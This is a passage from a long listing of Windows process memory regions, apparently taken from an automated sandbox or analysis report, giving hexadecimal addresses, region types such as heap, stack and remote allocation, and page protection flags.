page read and write
|
||
237F5775000
|
heap
|
page read and write
|
||
29C1C52A000
|
heap
|
page read and write
|
||
27858488000
|
heap
|
page read and write
|
||
806DDFE000
|
stack
|
page read and write
|
||
18E5A77D000
|
heap
|
page read and write
|
||
27DB6FBB000
|
heap
|
page read and write
|
||
2D10000
|
heap
|
page read and write
|
||
182AE32A000
|
heap
|
page read and write
|
||
1E123220000
|
heap
|
page read and write
|
||
D022F8B000
|
stack
|
page read and write
|
||
1F505E39000
|
heap
|
page read and write
|
||
18E5A743000
|
heap
|
page read and write
|
||
27DB7341000
|
heap
|
page read and write
|
||
29C1E816000
|
heap
|
page read and write
|
||
18E5A77C000
|
heap
|
page read and write
|
||
28531402000
|
trusted library allocation
|
page read and write
|
||
7FF642FB0000
|
unkown
|
page readonly
|
||
B8E000
|
stack
|
page read and write
|
||
27DB7024000
|
heap
|
page read and write
|
||
18E5A6BC000
|
heap
|
page read and write
|
||
2E0F000
|
heap
|
page read and write
|
||
29C1E661000
|
heap
|
page read and write
|
||
29031F80000
|
heap
|
page read and write
|
||
29C1C5B9000
|
heap
|
page read and write
|
||
27DB6F9B000
|
heap
|
page read and write
|
||
18E5A81F000
|
heap
|
page read and write
|
||
2AC33059000
|
heap
|
page read and write
|
||
18E587AD000
|
heap
|
page read and write
|
||
27DB729B000
|
heap
|
page read and write
|
||
29C1E45D000
|
heap
|
page read and write
|
||
29C1C545000
|
heap
|
page read and write
|
||
27DB751E000
|
heap
|
page read and write
|
||
56D207F000
|
stack
|
page read and write
|
||
27DB7278000
|
heap
|
page read and write
|
||
2AC33042000
|
heap
|
page read and write
|
||
182AE120000
|
heap
|
page read and write
|
||
18E5AB59000
|
heap
|
page read and write
|
||
27DB6F9B000
|
heap
|
page read and write
|
||
27DB6F9B000
|
heap
|
page read and write
|
||
27DB72BE000
|
heap
|
page read and write
|
||
2981263F000
|
heap
|
page read and write
|
||
18E587A2000
|
heap
|
page read and write
|
||
182AE38E000
|
heap
|
page read and write
|
||
18E58842000
|
heap
|
page read and write
|
||
29032100000
|
heap
|
page read and write
|
||
27DB7045000
|
heap
|
page read and write
|
||
32C6000
|
heap
|
page read and write
|
||
18E5A81C000
|
heap
|
page read and write
|
||
27DB737C000
|
heap
|
page read and write
|
||
1F505C47000
|
heap
|
page read and write
|
||
27DB6F9B000
|
heap
|
page read and write
|
||
2DF0000
|
remote allocation
|
page read and write
|
||
1AFAEAC0000
|
heap
|
page read and write
|
||
18E5A832000
|
heap
|
page read and write
|
||
29C1E2E0000
|
heap
|
page read and write
|
||
29C1E24F000
|
heap
|
page read and write
|
||
231CDFB0000
|
heap
|
page read and write
|
||
29C1E905000
|
heap
|
page read and write
|
||
285312B0000
|
trusted library allocation
|
page read and write
|
||
1840D105000
|
heap
|
page read and write
|
||
1C82B7E0000
|
heap
|
page read and write
|
||
1F505E30000
|
heap
|
page read and write
|
||
29C1E45C000
|
heap
|
page read and write
|
||
27DB7045000
|
heap
|
page read and write
|
||
18E5AAA2000
|
heap
|
page read and write
|
||
7FF6434ED000
|
unkown
|
page readonly
|
||
29C1E4ED000
|
heap
|
page read and write
|
||
29812530000
|
heap
|
page read and write
|
||
29C1E3C2000
|
heap
|
page read and write
|
||
29C1E661000
|
heap
|
page read and write
|
||
2AC33032000
|
heap
|
page read and write
|
||
29C1EA61000
|
heap
|
page read and write
|
||
18E5AB50000
|
heap
|
page read and write
|
||
27DB7031000
|
heap
|
page read and write
|
||
650000
|
heap
|
page read and write
|
||
27DB72F8000
|
heap
|
page read and write
|
||
21271910000
|
heap
|
page read and write
|
||
2E17000
|
heap
|
page read and write
|
||
29C1C52F000
|
heap
|
page read and write
|
||
1778213F000
|
heap
|
page read and write
|
||
29C1E488000
|
heap
|
page read and write
|
||
34D9000
|
heap
|
page read and write
|
||
29C1E354000
|
heap
|
page read and write
|
||
CCF66FE000
|
stack
|
page read and write
|
||
32C0000
|
remote allocation
|
page read and write
|
||
27DB703B000
|
heap
|
page read and write
|
||
1EEDC265000
|
heap
|
page read and write
|
||
29C1C51F000
|
heap
|
page read and write
|
||
29C1E724000
|
heap
|
page read and write
|
||
221E5A20000
|
unkown
|
page readonly
|
||
29C1E484000
|
heap
|
page read and write
|
||
27DB7438000
|
heap
|
page read and write
|
||
177820B0000
|
heap
|
page read and write
|
||
2E20000
|
heap
|
page read and write
|
||
21271A4B000
|
heap
|
page read and write
|
||
18E5AB2E000
|
heap
|
page read and write
|
||
1EEDC28C000
|
heap
|
page read and write
|
||
182AE559000
|
heap
|
page read and write
|
||
A69727C000
|
stack
|
page read and write
|
||
1778212F000
|
heap
|
page read and write
|
||
B90000
|
remote allocation
|
page read and write
|
||
237F5560000
|
heap
|
page read and write
|
||
18E5AB33000
|
heap
|
page read and write
|
||
29C1E667000
|
heap
|
page read and write
|
||
29C1E661000
|
heap
|
page read and write
|
||
31E0000
|
heap
|
page read and write
|
||
18E5ABCD000
|
heap
|
page read and write
|
||
27DB7052000
|
heap
|
page read and write
|
||
29C1E7E5000
|
heap
|
page read and write
|
||
29C1C450000
|
heap
|
page read and write
|
||
1F505C48000
|
heap
|
page read and write
|
||
BD0000
|
remote allocation
|
page read and write
|
||
27DB72C2000
|
heap
|
page read and write
|
||
29C1E251000
|
heap
|
page read and write
|
||
29C1E9D0000
|
heap
|
page read and write
|
||
1F505B60000
|
unkown
|
page readonly
|
||
920000
|
heap
|
page read and write
|
||
221E5C20000
|
heap
|
page read and write
|
||
18E5A75D000
|
heap
|
page read and write
|
||
27DB7036000
|
heap
|
page read and write
|
||
29C1EB1A000
|
heap
|
page read and write
|
||
1EEDCC00000
|
heap
|
page read and write
|
||
27DB7043000
|
heap
|
page read and write
|
||
2E17000
|
heap
|
page read and write
|
||
A697BFE000
|
stack
|
page read and write
|
||
18E5AA77000
|
heap
|
page read and write
|
||
29C1E669000
|
heap
|
page read and write
|
||
231CE360000
|
heap
|
page read and write
|
||
27DB6EB0000
|
heap
|
page read and write
|
||
29C1E276000
|
heap
|
page read and write
|
||
29812520000
|
heap
|
page read and write
|
||
1EEDCA02000
|
heap
|
page read and write
|
||
29C1E72B000
|
heap
|
page read and write
|
||
27DB6E21000
|
heap
|
page read and write
|
||
B00000
|
heap
|
page read and write
|
||
221E5A30000
|
unkown
|
page read and write
|
||
5B37AFF000
|
stack
|
page read and write
|
||
3370000
|
heap
|
page read and write
|
||
27DB72A2000
|
heap
|
page read and write
|
||
18E5A66A000
|
heap
|
page read and write
|
||
315B000
|
heap
|
page read and write
|
||
29C1E7F5000
|
heap
|
page read and write
|
||
34C9000
|
heap
|
page read and write
|
||
374C67E000
|
stack
|
page read and write
|
||
18E5A82D000
|
heap
|
page read and write
|
||
29C1E28F000
|
heap
|
page read and write
|
||
1F505B80000
|
heap
|
page read and write
|
||
29C1C513000
|
heap
|
page read and write
|
||
27DB7348000
|
heap
|
page read and write
|
||
18E5A81C000
|
heap
|
page read and write
|
||
7FF6FBF70000
|
unkown
|
page readonly
|
||
1EEDC060000
|
heap
|
page read and write
|
||
C00000
|
trusted library allocation
|
page read and write
|
||
27DB7399000
|
heap
|
page read and write
|
||
27DB50A9000
|
heap
|
page read and write
|
||
5AAABAC000
|
stack
|
page read and write
|
||
27DB702A000
|
heap
|
page read and write
|
||
45922FE000
|
stack
|
page read and write
|
||
1F505C13000
|
heap
|
page read and write
|
||
7FF6434E4000
|
unkown
|
page write copy
|
||
18E5A626000
|
heap
|
page read and write
|
||
29C1E3CF000
|
heap
|
page read and write
|
||
27DB7036000
|
heap
|
page read and write
|
||
27DB6FBB000
|
heap
|
page read and write
|
||
27DB6EB1000
|
heap
|
page read and write
|
||
18E5AA77000
|
heap
|
page read and write
|
||
1E808C2A000
|
heap
|
page read and write
|
||
4D1FDFE000
|
stack
|
page read and write
|
||
27DB702D000
|
heap
|
page read and write
|
||
2AC32E90000
|
heap
|
page read and write
|
||
27DB6F95000
|
heap
|
page read and write
|
||
18E5A6FC000
|
heap
|
page read and write
|
||
182AE310000
|
heap
|
page read and write
|
||
EE6AAFE000
|
stack
|
page read and write
|
||
1B09F400000
|
heap
|
page read and write
|
||
27DB743E000
|
heap
|
page read and write
|
||
7FF6434E4000
|
unkown
|
page write copy
|
||
56D24FE000
|
stack
|
page read and write
|
||
29C1E95B000
|
heap
|
page read and write
|
||
374C87F000
|
stack
|
page read and write
|
||
B20000
|
heap
|
page read and write
|
||
3060000
|
trusted library allocation
|
page read and write
|
||
18E5AB50000
|
heap
|
page read and write
|
||
1EEDCC30000
|
heap
|
page read and write
|
||
27DB7277000
|
heap
|
page read and write
|
||
18E5A6FA000
|
heap
|
page read and write
|
||
28531330000
|
remote allocation
|
page read and write
|
||
18E5AA70000
|
heap
|
page read and write
|
||
231CEE90000
|
heap
|
page readonly
|
||
2AC33802000
|
trusted library allocation
|
page read and write
|
||
2E17000
|
heap
|
page read and write
|
||
18E5A77C000
|
heap
|
page read and write
|
||
27DB7024000
|
heap
|
page read and write
|
||
BF0000
|
remote allocation
|
page read and write
|
||
1C82BA00000
|
heap
|
page read and write
|
||
2E0F000
|
heap
|
page read and write
|
||
29C1E45C000
|
heap
|
page read and write
|
||
1B09F3C0000
|
trusted library allocation
|
page read and write
|
||
17782160000
|
heap
|
page read and write
|
||
1EEDC070000
|
heap
|
page read and write
|
||
29C1E223000
|
heap
|
page read and write
|
||
1E122F80000
|
unkown
|
page read and write
|
||
27DB6E54000
|
heap
|
page read and write
|
||
29C1E3D9000
|
heap
|
page read and write
|
||
78E000
|
stack
|
page read and write
|
||
231CE001000
|
heap
|
page read and write
|
||
A697DFF000
|
stack
|
page read and write
|
||
3230000
|
trusted library allocation
|
page read and write
|
||
182AE160000
|
unkown
|
page readonly
|
||
18E5AA79000
|
heap
|
page read and write
|
||
278583C0000
|
heap
|
page read and write
|
||
29C1E354000
|
heap
|
page read and write
|
||
27DB50D0000
|
heap
|
page read and write
|
||
1778216A000
|
heap
|
page read and write
|
||
29C1E936000
|
heap
|
page read and write
|
||
18E5AC3D000
|
heap
|
page read and write
|
||
29C1E334000
|
heap
|
page read and write
|
||
27DB751E000
|
heap
|
page read and write
|
||
18E5AAAC000
|
heap
|
page read and write
|
||
27DB6E21000
|
heap
|
page read and write
|
||
29C1E803000
|
heap
|
page read and write
|
||
29C1E661000
|
heap
|
page read and write
|
||
F6F377F000
|
stack
|
page read and write
|
||
18E5AB21000
|
heap
|
page read and write
|
||
1F505C4C000
|
heap
|
page read and write
|
||
29C1E35E000
|
heap
|
page read and write
|
||
1B09F502000
|
heap
|
page read and write
|
||
29C1C4C0000
|
heap
|
page read and write
|
||
18E5AB8C000
|
heap
|
page read and write
|
||
E7C9AFF000
|
unkown
|
page read and write
|
||
2C66000
|
heap
|
page read and write
|
||
2AC3305B000
|
heap
|
page read and write
|
||
1B09F448000
|
heap
|
page read and write
|
||
1840CB9A000
|
heap
|
page read and write
|
||
18E587AE000
|
heap
|
page read and write
|
||
29C1C55D000
|
heap
|
page read and write
|
||
182AE396000
|
heap
|
page read and write
|
||
1E122F70000
|
unkown
|
page readonly
|
||
CCF68FE000
|
stack
|
page read and write
|
||
2852F82A000
|
heap
|
page read and write
|
||
29032108000
|
heap
|
page read and write
|
||
1F505C91000
|
heap
|
page read and write
|
||
E0B447F000
|
stack
|
page read and write
|
||
278583F0000
|
trusted library allocation
|
page read and write
|
||
182AE397000
|
heap
|
page read and write
|
||
7FF643397000
|
unkown
|
page readonly
|
||
2AC33013000
|
heap
|
page read and write
|
||
29C1E326000
|
heap
|
page read and write
|
||
29C1E315000
|
heap
|
page read and write
|
||
C0E000
|
stack
|
page read and write
|
||
29C1E334000
|
heap
|
page read and write
|
||
1840CB40000
|
heap
|
page read and write
|
||
18E5AB16000
|
heap
|
page read and write
|
||
27DB6FBF000
|
heap
|
page read and write
|
||
1F505B50000
|
unkown
|
page readonly
|
||
278584E7000
|
heap
|
page read and write
|
||
34CD000
|
heap
|
page read and write
|
||
1AFAED02000
|
heap
|
page read and write
|
||
231CDFF9000
|
heap
|
page read and write
|
||
2719C250000
|
heap
|
page read and write
|
||
806DAFE000
|
stack
|
page read and write
|
||
1EEDC229000
|
heap
|
page read and write
|
||
237F57E5000
|
heap
|
page read and write
|
||
29C1E357000
|
heap
|
page read and write
|
||
1C82BA3C000
|
heap
|
page read and write
|
||
2DE7000
|
heap
|
page read and write
|
||
EE6ACF8000
|
stack
|
page read and write
|
||
316F000
|
heap
|
page read and write
|
||
2C57000
|
heap
|
page read and write
|
||
2852F868000
|
heap
|
page read and write
|
||
29C1E6FE000
|
heap
|
page read and write
|
||
18E5A81C000
|
heap
|
page read and write
|
||
29C1E484000
|
heap
|
page read and write
|
||
216AF4E7000
|
heap
|
page read and write
|
||
29C1E335000
|
heap
|
page read and write
|
||
33CE000
|
heap
|
page read and write
|
||
18E5AB33000
|
heap
|
page read and write
|
||
28531330000
|
remote allocation
|
page read and write
|
||
29C1E901000
|
heap
|
page read and write
|
||
221E5A6B000
|
heap
|
page read and write
|
||
221E5A93000
|
heap
|
page read and write
|
||
7FF797397000
|
unkown
|
page readonly
|
||
33EF000
|
stack
|
page read and write
|
||
29C1E24F000
|
heap
|
page read and write
|
||
29C1E744000
|
heap
|
page read and write
|
||
29C1E39D000
|
heap
|
page read and write
|
||
5B37BFA000
|
stack
|
page read and write
|
||
29C1E464000
|
heap
|
page read and write
|
||
27DB704E000
|
heap
|
page read and write
|
||
29C1E8E2000
|
heap
|
page read and write
|
||
34C9000
|
heap
|
page read and write
|
||
7FF642FB1000
|
unkown
|
page execute read
|
||
27DB6E90000
|
heap
|
page read and write
|
||
1EEDCB22000
|
heap
|
page read and write
|
||
2AC33043000
|
heap
|
page read and write
|
||
27DB6FBF000
|
heap
|
page read and write
|
||
27DB6FB5000
|
heap
|
page read and write
|
||
29C1E732000
|
heap
|
page read and write
|
||
21271A4E000
|
heap
|
page read and write
|
||
EBBDEFF000
|
stack
|
page read and write
|
||
27DB4EF0000
|
remote allocation
|
page read and write
|
||
29812667000
|
heap
|
page read and write
|
||
18E5A6FC000
|
heap
|
page read and write
|
||
1B09F429000
|
heap
|
page read and write
|
||
29C1E354000
|
heap
|
page read and write
|
||
56D257E000
|
stack
|
page read and write
|
||
27DB50E0000
|
heap
|
page read and write
|
||
33C0000
|
heap
|
page read and write
|
||
1F505C54000
|
heap
|
page read and write
|
||
1E808C10000
|
heap
|
page read and write
|
||
18E5A81F000
|
heap
|
page read and write
|
||
29C1E3CF000
|
heap
|
page read and write
|
||
2AC33033000
|
heap
|
page read and write
|
||
29C1C5BC000
|
heap
|
page read and write
|
||
7FFC23C75000
|
unkown
|
page readonly
|
||
2DE0000
|
heap
|
page read and write
|
||
278584CA000
|
heap
|
page read and write
|
||
29812702000
|
heap
|
page read and write
|
||
29C1E230000
|
heap
|
page read and write
|
||
806D1FE000
|
stack
|
page read and write
|
||
18E5AABB000
|
heap
|
page read and write
|
||
29C1E32D000
|
heap
|
page read and write
|
||
29C1E708000
|
heap
|
page read and write
|
||
29C1E45C000
|
heap
|
page read and write
|
||
29C1E7A5000
|
heap
|
page read and write
|
||
27DB6EEF000
|
heap
|
page read and write
|
||
3240000
|
heap
|
page read and write
|
||
18E5A82A000
|
heap
|
page read and write
|
||
18E5AB39000
|
heap
|
page read and write
|
||
7FF6FBF70000
|
unkown
|
page readonly
|
||
3167000
|
heap
|
page read and write
|
||
2DA0000
|
heap
|
page read and write
|
||
303E000
|
stack
|
page read and write
|
||
5B37CFA000
|
stack
|
page read and write
|
||
29C1E2E4000
|
heap
|
page read and write
|
||
29C1C57C000
|
heap
|
page read and write
|
||
18E5A75A000
|
heap
|
page read and write
|
||
29C1E2DE000
|
heap
|
page read and write
|
||
1E808D10000
|
heap
|
page read and write
|
||
27DB7328000
|
heap
|
page read and write
|
||
27DB6E2E000
|
heap
|
page read and write
|
||
2AC33102000
|
heap
|
page read and write
|
||
18E586F0000
|
heap
|
page read and write
|
||
29C1E3DA000
|
heap
|
page read and write
|
||
18E5A6FC000
|
heap
|
page read and write
|
||
5AAAFF9000
|
stack
|
page read and write
|
||
1EEDC313000
|
heap
|
page read and write
|
||
182AE353000
|
heap
|
page read and write
|
||
1F505C6A000
|
heap
|
page read and write
|
||
29C1E224000
|
heap
|
page read and write
|
||
27DB6E7B000
|
heap
|
page read and write
|
||
182AE3D0000
|
heap
|
page read and write
|
||
237F5804000
|
heap
|
page read and write
|
||
1778213B000
|
heap
|
page read and write
|
||
D0235FE000
|
stack
|
page read and write
|
||
27DB733F000
|
heap
|
page read and write
|
||
18E5AB52000
|
heap
|
page read and write
|
||
27DB5118000
|
heap
|
page read and write
|
||
27DB7047000
|
heap
|
page read and write
|
||
27DB7026000
|
heap
|
page read and write
|
||
29C1E32B000
|
heap
|
page read and write
|
||
237F57E2000
|
heap
|
page read and write
|
||
1F505C53000
|
heap
|
page read and write
|
||
BC0000
|
remote allocation
|
page read and write
|
||
2852F720000
|
heap
|
page read and write
|
||
18E5AB5C000
|
heap
|
page read and write
|
||
7FF6FC4AB000
|
unkown
|
page read and write
|
||
29C1E729000
|
heap
|
page read and write
|
||
CCF69FE000
|
stack
|
page read and write
|
||
A9203F8000
|
stack
|
page read and write
|
||
27DB703C000
|
heap
|
page read and write
|
||
18E5AC46000
|
heap
|
page read and write
|
||
18E5AA71000
|
heap
|
page read and write
|
||
2852F85C000
|
heap
|
page read and write
|
||
18E5AB50000
|
heap
|
page read and write
|
||
B40E3AD000
|
stack
|
page read and write
|
||
18E5A82E000
|
heap
|
page read and write
|
||
27DB6FC6000
|
heap
|
page read and write
|
||
29C1E3DA000
|
heap
|
page read and write
|
||
18E5AAA2000
|
heap
|
page read and write
|
||
1EEDCC27000
|
heap
|
page read and write
|
||
17782090000
|
heap
|
page read and write
|
||
1EEDCB22000
|
heap
|
page read and write
|
||
30B6000
|
heap
|
page read and write
|
||
221E5D40000
|
heap
|
page read and write
|
||
29C1E661000
|
heap
|
page read and write
|
||
18E5A638000
|
heap
|
page read and write
|
||
27DB6F9C000
|
heap
|
page read and write
|
||
231CDFC0000
|
heap
|
page read and write
|
||
18E5AB50000
|
heap
|
page read and write
|
||
21271950000
|
unkown
|
page readonly
|
||
29C1E2E4000
|
heap
|
page read and write
|
||
27DB7027000
|
heap
|
page read and write
|
||
29C1E46C000
|
heap
|
page read and write
|
||
18E5A81C000
|
heap
|
page read and write
|
||
18E5AB41000
|
heap
|
page read and write
|
||
18E5AA87000
|
heap
|
page read and write
|
||
EC3A2FD000
|
stack
|
page read and write
|
||
7FF6FC4AD000
|
unkown
|
page readonly
|
||
216AF440000
|
heap
|
page read and write
|
||
1F505C6D000
|
heap
|
page read and write
|
||
2D8E000
|
stack
|
page read and write
|
||
29C1E355000
|
heap
|
page read and write
|
||
27DB6FBF000
|
heap
|
page read and write
|
||
182AE559000
|
heap
|
page read and write
|
||
720000
|
remote allocation
|
page read and write
|
||
1E808A30000
|
heap
|
page read and write
|
||
B2D000
|
stack
|
page read and write
|
||
7FFC23C60000
|
unkown
|
page readonly
|
||
27DB733D000
|
heap
|
page read and write
|
||
221E5B11000
|
heap
|
page read and write
|
||
231CDF30000
|
heap
|
page read and write
|
||
27DB7024000
|
heap
|
page read and write
|
||
7FF6434ED000
|
unkown
|
page readonly
|
||
27DB6E7E000
|
heap
|
page read and write
|
||
27DB7341000
|
heap
|
page read and write
|
||
2719C150000
|
heap
|
page read and write
|
||
18E5A64A000
|
heap
|
page read and write
|
||
29C1E3D9000
|
heap
|
page read and write
|
||
18E5ACEA000
|
heap
|
page read and write
|
||
29C1E729000
|
heap
|
page read and write
|
||
29C1C528000
|
heap
|
page read and write
|
||
27DB6F9B000
|
heap
|
page read and write
|
||
F9A73FC000
|
stack
|
page read and write
|
||
29C1E25D000
|
heap
|
page read and write
|
||
27DB6E34000
|
heap
|
page read and write
|
||
806D2FE000
|
stack
|
page read and write
|
||
27DB6FC6000
|
heap
|
page read and write
|
||
2E20000
|
heap
|
page read and write
|
||
18E5AA71000
|
heap
|
page read and write
|
||
1E12313A000
|
heap
|
page read and write
|
||
B20000
|
trusted library allocation
|
page read and write
|
||
29C1E6B2000
|
heap
|
page read and write
|
||
29C1E667000
|
heap
|
page read and write
|
||
237F5770000
|
heap
|
page read and write
|
||
182AE346000
|
heap
|
page read and write
|
||
29C1E207000
|
heap
|
page read and write
|
||
27DB6FBD000
|
heap
|
page read and write
|
||
1EEDCB02000
|
heap
|
page read and write
|
||
221E5ACA000
|
heap
|
page read and write
|
||
18E5A822000
|
heap
|
page read and write
|
||
18E58842000
|
heap
|
page read and write
|
||
18E5AB41000
|
heap
|
page read and write
|
||
7FF797397000
|
unkown
|
page readonly
|
||
2852F802000
|
heap
|
page read and write
|
||
29812666000
|
heap
|
page read and write
|
||
56D22FA000
|
stack
|
page read and write
|
||
7FF6FBF70000
|
unkown
|
page readonly
|
||
182AE170000
|
unkown
|
page readonly
|
||
18E5A824000
|
heap
|
page read and write
|
||
1E808C19000
|
heap
|
page read and write
|
||
27DB6FAC000
|
heap
|
page read and write
|
||
1E808BB0000
|
heap
|
page read and write
|
||
4ED000
|
stack
|
page read and write
|
||
34A0000
|
heap
|
page read and write
|
||
18E5A77C000
|
heap
|
page read and write
|
||
29C1E240000
|
heap
|
page read and write
|
||
1F505C54000
|
heap
|
page read and write
|
||
29C1E2BD000
|
heap
|
page read and write
|
||
1EEDCB12000
|
heap
|
page read and write
|
||
7FF6FC357000
|
unkown
|
page readonly
|
||
27DB50BA000
|
heap
|
page read and write
|
||
EBBDFFF000
|
stack
|
page read and write
|
||
182AE555000
|
heap
|
page read and write
|
||
18E5ABDA000
|
heap
|
page read and write
|
||
29C1E355000
|
heap
|
page read and write
|
||
5AAB179000
|
stack
|
page read and write
|
||
27DB6E27000
|
heap
|
page read and write
|
||
27858502000
|
heap
|
page read and write
|
||
182AE38C000
|
heap
|
page read and write
|
||
18E5AC3D000
|
heap
|
page read and write
|
||
550000
|
remote allocation
|
page read and write
|
||
30A0000
|
heap
|
page read and write
|
||
27DB6E2E000
|
heap
|
page read and write
|
||
18E5AA71000
|
heap
|
page read and write
|
||
18E5AB50000
|
heap
|
page read and write
|
||
18E5AC46000
|
heap
|
page read and write
|
||
182AE180000
|
unkown
|
page read and write
|
||
18E5AD2A000
|
heap
|
page read and write
|
||
2852F84C000
|
heap
|
page read and write
|
||
18E5A63E000
|
heap
|
page read and write
|
||
27DB7525000
|
heap
|
page read and write
|
||
18E5AA71000
|
heap
|
page read and write
|
||
29C1E25D000
|
heap
|
page read and write
|
||
1840CB5F000
|
heap
|
page read and write
|
||
27DB7330000
|
heap
|
page read and write
|
||
59D40FE000
|
stack
|
page read and write
|
||
29C1E76D000
|
heap
|
page read and write
|
||
27DB732C000
|
heap
|
page read and write
|
||
29C1C4C8000
|
heap
|
page read and write
|
||
27DB6F9B000
|
heap
|
page read and write
|
||
2D55000
|
heap
|
page read and write
|
||
231CEEB0000
|
trusted library allocation
|
page read and write
|
||
29C1E2D5000
|
heap
|
page read and write
|
||
182AE3A9000
|
heap
|
page read and write
|
||
1F505C48000
|
heap
|
page read and write
|
||
29C1E3CC000
|
heap
|
page read and write
|
||
27DB7036000
|
heap
|
page read and write
|
||
4D200FE000
|
stack
|
page read and write
|
||
1E1230F0000
|
heap
|
page read and write
|
||
7FFC23C61000
|
unkown
|
page execute read
|
||
1AFAEC02000
|
heap
|
page read and write
|
||
27DB5079000
|
heap
|
page read and write
|
||
18E5AB44000
|
heap
|
page read and write
|
||
F9A797E000
|
stack
|
page read and write
|
||
BD0000
|
remote allocation
|
page read and write
|
||
29C1E942000
|
heap
|
page read and write
|
||
29C1E2E4000
|
heap
|
page read and write
|
||
18E5AC14000
|
heap
|
page read and write
|
||
29C1E732000
|
heap
|
page read and write
|
||
29C1E221000
|
heap
|
page read and write
|
||
7FF6434E6000
|
unkown
|
page write copy
|
||
29C1E39D000
|
heap
|
page read and write
|
||
18E5A64C000
|
heap
|
page read and write
|
||
27DB7044000
|
heap
|
page read and write
|
||
325C000
|
stack
|
page read and write
|
||
EE6AEF8000
|
stack
|
page read and write
|
||
29C1E240000
|
heap
|
page read and write
|
||
A4E000
|
heap
|
page read and write
|
||
27DB7316000
|
heap
|
page read and write
|
||
1B09F413000
|
heap
|
page read and write
|
||
18E5A63E000
|
heap
|
page read and write
|
||
29C1E732000
|
heap
|
page read and write
|
||
182AE280000
|
heap
|
page read and write
|
||
7FF79749A000
|
unkown
|
page readonly
|
||
18E5AA71000
|
heap
|
page read and write
|
||
3159000
|
heap
|
page read and write
|
||
21271D65000
|
heap
|
page read and write
|
||
BCC000
|
stack
|
page read and write
|
||
29C1E3C2000
|
heap
|
page read and write
|
||
18E58740000
|
remote allocation
|
page read and write
|
||
18E5A6BD000
|
heap
|
page read and write
|
||
29C1E661000
|
heap
|
page read and write
|
||
2DF0000
|
trusted library allocation
|
page read and write
|
||
7FF796FB0000
|
unkown
|
page readonly
|
||
1AFAF402000
|
trusted library allocation
|
page read and write
|
||
18E5AA71000
|
heap
|
page read and write
|
||
18E5A75D000
|
heap
|
page read and write
|
||
29C1E467000
|
heap
|
page read and write
|
||
27DB702D000
|
heap
|
page read and write
|
||
18E5A81C000
|
heap
|
page read and write
|
||
29C1E6B1000
|
heap
|
page read and write
|
||
3340000
|
trusted library allocation
|
page read and write
|
||
2AC33049000
|
heap
|
page read and write
|
||
1E123129000
|
heap
|
page read and write
|
||
29C1E2CB000
|
heap
|
page read and write
|
||
18E5A6BC000
|
heap
|
page read and write
|
||
27DB6F95000
|
heap
|
page read and write
|
||
2852F85A000
|
heap
|
page read and write
|
||
2AC33027000
|
heap
|
page read and write
|
||
18E5AB50000
|
heap
|
page read and write
|
||
18E5878E000
|
heap
|
page read and write
|
||
27DB6F9B000
|
heap
|
page read and write
|
||
1B09F437000
|
heap
|
page read and write
|
||
29C1E35E000
|
heap
|
page read and write
|
||
27858D00000
|
heap
|
page read and write
|
||
29C1E957000
|
heap
|
page read and write
|
||
2AC3306C000
|
heap
|
page read and write
|
||
29C1E674000
|
heap
|
page read and write
|
||
7FFC23575000
|
unkown
|
page readonly
|
||
221E5A93000
|
heap
|
page read and write
|
||
2C8E000
|
stack
|
page read and write
|
||
56D1AEB000
|
stack
|
page read and write
|
||
18E5A826000
|
heap
|
page read and write
|
||
27DB6F11000
|
heap
|
page read and write
|
||
27DB7046000
|
heap
|
page read and write
|
||
27DB69C0000
|
heap
|
page read and write
|
||
7FF796FB1000
|
unkown
|
page execute read
|
||
1AFAEB90000
|
remote allocation
|
page read and write
|
||
29C1E729000
|
heap
|
page read and write
|
||
27DB7271000
|
heap
|
page read and write
|
||
1F505B70000
|
unkown
|
page read and write
|
||
29C1E2C6000
|
heap
|
page read and write
|
||
21271960000
|
unkown
|
page readonly
|
||
29C1E908000
|
heap
|
page read and write
|
||
C10000
|
trusted library allocation
|
page read and write
|
||
29C1E45C000
|
heap
|
page read and write
|
||
221E5A8C000
|
heap
|
page read and write
|
||
29C1E221000
|
heap
|
page read and write
|
||
27DB6E98000
|
heap
|
page read and write
|
||
307C000
|
stack
|
page read and write
|
||
29812600000
|
heap
|
page read and write
|
||
30BF000
|
heap
|
page read and write
|
||
18E587A2000
|
heap
|
page read and write
|
||
7FF6434ED000
|
unkown
|
page readonly
|
||
18E5AB59000
|
heap
|
page read and write
|
||
27DB50BC000
|
heap
|
page read and write
|
||
BC0000
|
remote allocation
|
page read and write
|
||
29C1E39D000
|
heap
|
page read and write
|
||
AC0000
|
heap
|
page read and write
|
||
1EEDC3E5000
|
heap
|
page read and write
|
||
18E5ABA4000
|
heap
|
page read and write
|
||
2719C15B000
|
heap
|
page read and write
|
||
29C1E2C6000
|
heap
|
page read and write
|
||
29C1E3DA000
|
heap
|
page read and write
|
||
2E17000
|
heap
|
page read and write
|
||
29C1E276000
|
heap
|
page read and write
|
||
7FF796FB0000
|
unkown
|
page readonly
|
||
2852F7B0000
|
trusted library allocation
|
page read and write
|
||
7FF7974E4000
|
unkown
|
page read and write
|
||
2DDE000
|
stack
|
page read and write
|
||
EE6A7FE000
|
stack
|
page read and write
|
||
18E5AB80000
|
heap
|
page read and write
|
||
EBBE2FE000
|
stack
|
page read and write
|
||
29C1E729000
|
heap
|
page read and write
|
||
18E5A69D000
|
heap
|
page read and write
|
||
806CD4A000
|
stack
|
page read and write
|
||
806E1F8000
|
stack
|
page read and write
|
||
2E01000
|
heap
|
page read and write
|
||
27DB50BF000
|
heap
|
page read and write
|
||
18E5AA71000
|
heap
|
page read and write
|
||
5AAAEFF000
|
stack
|
page read and write
|
||
2AC3306E000
|
heap
|
page read and write
|
||
D0237FF000
|
stack
|
page read and write
|
||
29C1E2DF000
|
heap
|
page read and write
|
||
1F505C13000
|
heap
|
page read and write
|
||
2AC33030000
|
heap
|
page read and write
|
||
29C1E355000
|
heap
|
page read and write
|
||
18E58758000
|
heap
|
page read and write
|
||
18E5A699000
|
heap
|
page read and write
|
||
18E5AC3D000
|
heap
|
page read and write
|
||
29C1C584000
|
heap
|
page read and write
|
||
29C1DDB0000
|
heap
|
page read and write
|
||
1E1230F5000
|
heap
|
page read and write
|
||
1778217E000
|
heap
|
page read and write
|
||
1F505E40000
|
heap
|
page read and write
|
||
29C1C536000
|
heap
|
page read and write
|
||
18E5AAA8000
|
heap
|
page read and write
|
||
221E5A87000
|
heap
|
page read and write
|
||
2DF0000
|
remote allocation
|
page read and write
|
||
BF0000
|
remote allocation
|
page read and write
|
||
27DB6FBB000
|
heap
|
page read and write
|
||
3167000
|
heap
|
page read and write
|
||
30BE000
|
heap
|
page read and write
|
||
29C1E45C000
|
heap
|
page read and write
|
||
1F505E39000
|
heap
|
page read and write
|
||
18E5A77C000
|
heap
|
page read and write
|
||
